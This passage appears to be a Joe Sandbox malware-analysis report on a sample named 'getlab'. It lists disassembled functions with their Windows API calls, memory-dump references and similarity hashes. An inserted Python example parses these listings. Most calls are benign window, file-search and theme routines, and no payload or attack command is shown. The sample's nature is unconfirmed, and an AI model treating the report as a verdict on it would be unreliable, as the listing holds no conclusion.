                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Show$IconicLong
                                                                          • String ID:
                                                                          • API String ID: 2754861897-0
                                                                          • Opcode ID: 9bd873c9f0220d19758c381c5bb4dd0340ed2cd746ce77723441eba7bf105e49
                                                                          • Instruction ID: 41c7b109e84caadfbd7bdb59434551f42a7ac603c048c530ac1057f10a9e5501
                                                                          • Opcode Fuzzy Hash: 9bd873c9f0220d19758c381c5bb4dd0340ed2cd746ce77723441eba7bf105e49
                                                                          • Instruction Fuzzy Hash: F30152742452009FD600F7A58E89B6B33E55B14304F480977BB009F2E6CAADD841E71C
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,0046264C), ref: 004625D0
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0046262C,?,00000000,?,00000000,0046264C), ref: 0046260C
                                                                          • FindClose.KERNEL32(000000FF,00462633,0046262C,?,00000000,?,00000000,0046264C), ref: 00462626
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID:
                                                                          • API String ID: 3541575487-0
                                                                          • Opcode ID: b00d8aacf9e7513e04c7705060d933e78633390233e65912034b0f0047bc0786
                                                                          • Instruction ID: 35f3f22b183c5d1ecd4ea1753066c09f008546f1eb4ef8afe9bdb694ca888e99
                                                                          • Opcode Fuzzy Hash: b00d8aacf9e7513e04c7705060d933e78633390233e65912034b0f0047bc0786
                                                                          • Instruction Fuzzy Hash: 07210B31904B047ECB11EB75CC41ACEBBBCDB49304F5084F7A808E21A1E6789E55CE5A
                                                                          APIs
                                                                          • IsIconic.USER32(?), ref: 004241DC
                                                                          • SetActiveWindow.USER32(?,?,?,0046CB73), ref: 004241E9
                                                                            • Part of subcall function 00423644: ShowWindow.USER32(00410648,00000009,?,00000000,0041ED9C,00423932,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04), ref: 0042365F
                                                                            • Part of subcall function 00423B0C: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021525AC,00424202,?,?,?,0046CB73), ref: 00423B47
                                                                          • SetFocus.USER32(00000000,?,?,?,0046CB73), ref: 00424216
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ActiveFocusIconicShow
                                                                          • String ID:
                                                                          • API String ID: 649377781-0
                                                                          • Opcode ID: 362a53b09b72621cbce2071a633a460a23dddc7e90100e91eac1f534d9fc78be
                                                                          • Instruction ID: 7ea1460413e76a83717bea1d3364086182948ca7ce33fd4e030d283203b7bb74
                                                                          • Opcode Fuzzy Hash: 362a53b09b72621cbce2071a633a460a23dddc7e90100e91eac1f534d9fc78be
                                                                          • Instruction Fuzzy Hash: 5BF03071B0012087CB10AFAA9885B9673B8AB48305F5500BBBD05DF357C67CDC058768
                                                                          APIs
                                                                          • IsIconic.USER32(?), ref: 00417D07
                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D25
                                                                          • GetWindowPlacement.USER32(?,0000002C), ref: 00417D5B
                                                                          • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D82
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Placement$Iconic
                                                                          • String ID:
                                                                          • API String ID: 568898626-0
                                                                          • Opcode ID: 47b671fdedc35fdf98b71b51c82caa7697cc0af64fcddd8af6052c4a4d8e86ab
                                                                          • Instruction ID: 3daf342c44424aa5ce1366acdd2a80e82e5cfeaf10da0033b5167ac39e8fb95c
                                                                          • Opcode Fuzzy Hash: 47b671fdedc35fdf98b71b51c82caa7697cc0af64fcddd8af6052c4a4d8e86ab
                                                                          • Instruction Fuzzy Hash: BE017C31204108ABDB10EE69ECC1EE773A8AF59324F154166FE09CF242D638EC8087A8
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CaptureIconic
                                                                          • String ID:
                                                                          • API String ID: 2277910766-0
                                                                          • Opcode ID: 9fb93b599f870259b4000da7575617f39aed9b1e5bccbb5d02bb51a51f71ab84
                                                                          • Instruction ID: 3321041a09622c131d5de1c426c5b9ba37bf97161ea704a377034d17a7c99502
                                                                          • Opcode Fuzzy Hash: 9fb93b599f870259b4000da7575617f39aed9b1e5bccbb5d02bb51a51f71ab84
                                                                          • Instruction Fuzzy Hash: 2EF0AF7230564157D7209B2EC984ABB62F69F88318B54483FE419CBB61EB78DCC08658
                                                                          APIs
                                                                          • IsIconic.USER32(?), ref: 00424193
                                                                            • Part of subcall function 00423A7C: EnumWindows.USER32(00423A14), ref: 00423AA0
                                                                            • Part of subcall function 00423A7C: GetWindow.USER32(?,00000003), ref: 00423AB5
                                                                            • Part of subcall function 00423A7C: GetWindowLongA.USER32(?,000000EC), ref: 00423AC4
                                                                            • Part of subcall function 00423A7C: SetWindowPos.USER32(00000000,TAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241A3,?,?,00423D6B), ref: 00423AFA
                                                                          • SetActiveWindow.USER32(?,?,?,00423D6B,00000000,00424154), ref: 004241A7
                                                                            • Part of subcall function 00423644: ShowWindow.USER32(00410648,00000009,?,00000000,0041ED9C,00423932,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04), ref: 0042365F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                          • String ID:
                                                                          • API String ID: 2671590913-0
                                                                          • Opcode ID: dcd3cf20cd52624e3855be4655b1b3d00803fdb590b5af4931fd0619bf418583
                                                                          • Instruction ID: 714e4cd20337d44954868cb88e5cd3c5f05620b237e6b6751f152470bbecd415
                                                                          • Opcode Fuzzy Hash: dcd3cf20cd52624e3855be4655b1b3d00803fdb590b5af4931fd0619bf418583
                                                                          • Instruction Fuzzy Hash: 47E01AA070011087EB10AF69DCC9B9632A8BB4C304F5501BABD49CF25BD63CC8608728
                                                                          APIs
                                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127CD), ref: 004127BB
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: NtdllProc_Window
                                                                          • String ID:
                                                                          • API String ID: 4255912815-0
                                                                          • Opcode ID: fadc627793d3d758d03d3b6288103bd692d15878d139e3b8876b7a5e98d728c0
                                                                          • Instruction ID: 515a926e27beec0aab385df702329c93692b8444378934293cf55fba5e442f36
                                                                          • Opcode Fuzzy Hash: fadc627793d3d758d03d3b6288103bd692d15878d139e3b8876b7a5e98d728c0
                                                                          • Instruction Fuzzy Hash: 4951F335304205CFD714DB6ADA8099BF3E5EF94314B2481ABD815C33A1D7B8ADA2CB48
                                                                          APIs
                                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 004786A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: NtdllProc_Window
                                                                          • String ID:
                                                                          • API String ID: 4255912815-0
                                                                          • Opcode ID: 74fd435c634dc11c163aa08e5e8bd118cd21225c10192b8e8785eef0067adbbd
                                                                          • Instruction ID: b7c0c70f2a783e09ad8744fe0b8a2eb923ce1fb3c3bfc7260a93e3bfca3db08f
                                                                          • Opcode Fuzzy Hash: 74fd435c634dc11c163aa08e5e8bd118cd21225c10192b8e8785eef0067adbbd
                                                                          • Instruction Fuzzy Hash: 1C416875604104EFCB10CF99C6888AAB7F5FB48311B24C99AE80CEB701DB38EE41DB95
                                                                          APIs
                                                                          • ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045D067
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CryptFour
                                                                          • String ID:
                                                                          • API String ID: 2153018856-0
                                                                          • Opcode ID: 47a938482607ff708c7ba3b07c2d2a6c765e1a89700bf01dade5fb09ed1c08ae
                                                                          • Instruction ID: 2e238a974be0c8424367b3c35ccc205e7f0a308c5ec670be841bb4718b7179ff
                                                                          • Opcode Fuzzy Hash: 47a938482607ff708c7ba3b07c2d2a6c765e1a89700bf01dade5fb09ed1c08ae
                                                                          • Instruction Fuzzy Hash: 37C09BF200420CBF660057D5ECC9C77B75CF6586547508126F6048210195726C104574
                                                                          APIs
                                                                          • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046D934,?,0046DB15), ref: 0045D07A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CryptFour
                                                                          • String ID:
                                                                          • API String ID: 2153018856-0
                                                                          • Opcode ID: d02f27854c06b9b5253a86ca74e309db13f969305959900ff247638bb6719fe3
                                                                          • Instruction ID: 227689971defb3a768f182aa15824e3680876923b4d994b81e1676941902ce31
                                                                          • Opcode Fuzzy Hash: d02f27854c06b9b5253a86ca74e309db13f969305959900ff247638bb6719fe3
                                                                          • Instruction Fuzzy Hash: 9DA002B0A80300BAFD2057B05D4EF26352CA7D0F05F708465B202EA0D085A56410852C
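                                                                           An analyst working through a listing this long usually wants the blocks above in structured form, so that functions can be filtered by the APIs they call (directly or through the listed subcalls), rebased with the dump's Offset, or grouped by API ID. The parser below is an added example and is not Joe Sandbox code: its view of the block layout (APIs, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity, with Instruction Fuzzy Hash as the last field of every entry) is inferred from this page's text rather than from a published format, and SAMPLE is constructed from entries excerpted above with argument lists and Associated lines trimmed. The "Download File" link text that page extraction fused onto the Associated dump names is stripped while parsing.

```python
# Added example, not Joe Sandbox code: parse the "APIs / Memory Dump Source /
# Similarity" listings into queryable records. Layout inferred from this page.
import re
from dataclasses import dataclass, field
from typing import List, Optional

# "FindClose.KERNEL32(000000FF,?), ref: 00462626", optionally prefixed "Part of subcall function <callee>: "
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<subfn>[0-9A-Fa-f]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
SIM_KEYS = ("API ID", "String ID", "API String ID", "Opcode ID",
            "Instruction ID", "Opcode Fuzzy Hash", "Instruction Fuzzy Hash")
HEADERS = {"APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                   # call-site address as listed
    subcall_of: Optional[int]  # callee address when listed as a subcall

@dataclass
class FunctionEntry:
    apis: List[ApiCall] = field(default_factory=list)
    source_file: str = ""
    image_base: Optional[int] = None  # dump "Offset:", for rebasing refs
    associated: List[str] = field(default_factory=list)
    similarity: dict = field(default_factory=dict)

def _clean(raw: str) -> str:
    line = raw.strip().lstrip("\u2022").strip()  # drop the report's bullet
    # "Download File" is link text that page extraction fused onto dump names.
    return line.removesuffix("Download File").strip()

def parse_functions(text: str) -> List[FunctionEntry]:
    entries, cur = [], FunctionEntry()
    for raw in text.splitlines():
        line = _clean(raw)
        if not line or line in HEADERS:
            continue
        m = API_RE.match(line)
        if m:
            cur.apis.append(ApiCall(
                m["name"], m["module"], [a for a in m["args"].split(",") if a],
                int(m["ref"], 16), int(m["subfn"], 16) if m["subfn"] else None))
            continue
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "Source File":  # "<dump>, Offset: 00400000, based on PE: true"
            cur.source_file, _, rest = value.partition(", Offset: ")
            cur.image_base = int(rest.split(",")[0], 16) if rest else None
        elif key == "Associated":
            cur.associated.append(value)
        elif key in SIM_KEYS:
            cur.similarity[key] = value
            if key == SIM_KEYS[-1]:  # last field of every block: entry complete
                entries.append(cur)
                cur = FunctionEntry()
    return entries

def functions_calling(entries, *api_names, include_subcalls=True):
    # Entries whose listed calls (optionally counting subcalls) cover api_names.
    hits = []
    for e in entries:
        seen = {c.name for c in e.apis if include_subcalls or c.subcall_of is None}
        if all(n in seen for n in api_names):
            hits.append(e)
    return hits

# Constructed sample: three entries excerpted from this report, with argument
# lists and Associated lines trimmed to keep the example short.
SAMPLE = """\
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,0046264C), ref: 004625D0
• FindNextFileA.KERNEL32(000000FF,?,00000000,0046262C), ref: 0046260C
• FindClose.KERNEL32(000000FF,00462633,0046262C), ref: 00462626
Memory Dump Source
• Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Similarity
• API ID: Find$File$CloseFirstNext
• Instruction Fuzzy Hash: 07210B31904B047ECB11EB75CC41ACEBBBCDB49304F5084F7A808E21A1E6789E55CE5A
APIs
• IsIconic.USER32(?), ref: 004241DC
• SetActiveWindow.USER32(?,?,?,0046CB73), ref: 004241E9
  • Part of subcall function 00423644: ShowWindow.USER32(00410648,00000009), ref: 0042365F
Memory Dump Source
• Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Window$ActiveFocusIconicShow
• Instruction Fuzzy Hash: 5BF03071B0012087CB10AFAA9885B9673B8AB48305F5500BBBD05DF357C67CDC058768
Memory Dump Source
• Source File: 00000001.00000002.2938609988.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
Similarity
• API ID:
• Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
"""
```

With the full report text in place of SAMPLE, `functions_calling(entries, "FindFirstFileA", "FindNextFileA")` isolates the directory-enumeration routine, and `ref - image_base` gives the RVA to look up in the dump named by `source_file`. Entries whose APIs list was empty in the report (as for the second module at 10000000) still parse, with `apis == []`.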
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2938609988.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                           • Associated: 00000001.00000002.2938592656.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                                           • Associated: 00000001.00000002.2938626837.0000000010002000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_10000000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                          • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                          • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                          • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2938609988.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                           • Associated: 00000001.00000002.2938592656.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                                           • Associated: 00000001.00000002.2938626837.0000000010002000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_10000000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                          • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                          • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                          • Instruction Fuzzy Hash:
                                                                          APIs
                                                                            • Part of subcall function 0044B5FC: GetVersionExA.KERNEL32(00000094), ref: 0044B619
                                                                          • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F76D,004980FE), ref: 0044B677
                                                                          • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B68F
                                                                          • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A1
                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6B3
                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6C5
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6D7
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6E9
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B6FB
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B70D
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B71F
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B731
                                                                          • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B743
                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B755
                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B767
                                                                          • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B779
                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B78B
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B79D
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7AF
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7C1
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7D3
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7E5
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B7F7
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B809
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B81B
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B82D
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B83F
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B851
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B863
                                                                          • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B875
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B887
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B899
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8AB
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8BD
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8CF
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8E1
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B8F3
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B905
                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B917
                                                                          • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B929
                                                                          • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B93B
                                                                          • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B94D
                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B95F
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B971
                                                                          • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B983
                                                                          • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B995
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9A7
                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9B9
                                                                          • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9CB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$LibraryLoadVersion
                                                                          • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                          • API String ID: 1968650500-2910565190
                                                                          • Opcode ID: 6c67b19e24951571b37bf4c203fa1685e3d140177509ee69aad76801aa2bc0fe
                                                                          • Instruction ID: 77cdb2a24b144e98dd8fe0af3c477b00202e10f27d636664339925e4e96e780e
                                                                          • Opcode Fuzzy Hash: 6c67b19e24951571b37bf4c203fa1685e3d140177509ee69aad76801aa2bc0fe
                                                                          • Instruction Fuzzy Hash: 679198F0A40B11EBEB00AFB5AD96A2A3BA8EB15714310067BB454DF295D778DC108FDD
                                                                          APIs
                                                                          • 73A1A570.USER32(00000000,?,0041A93C,?), ref: 0041CA38
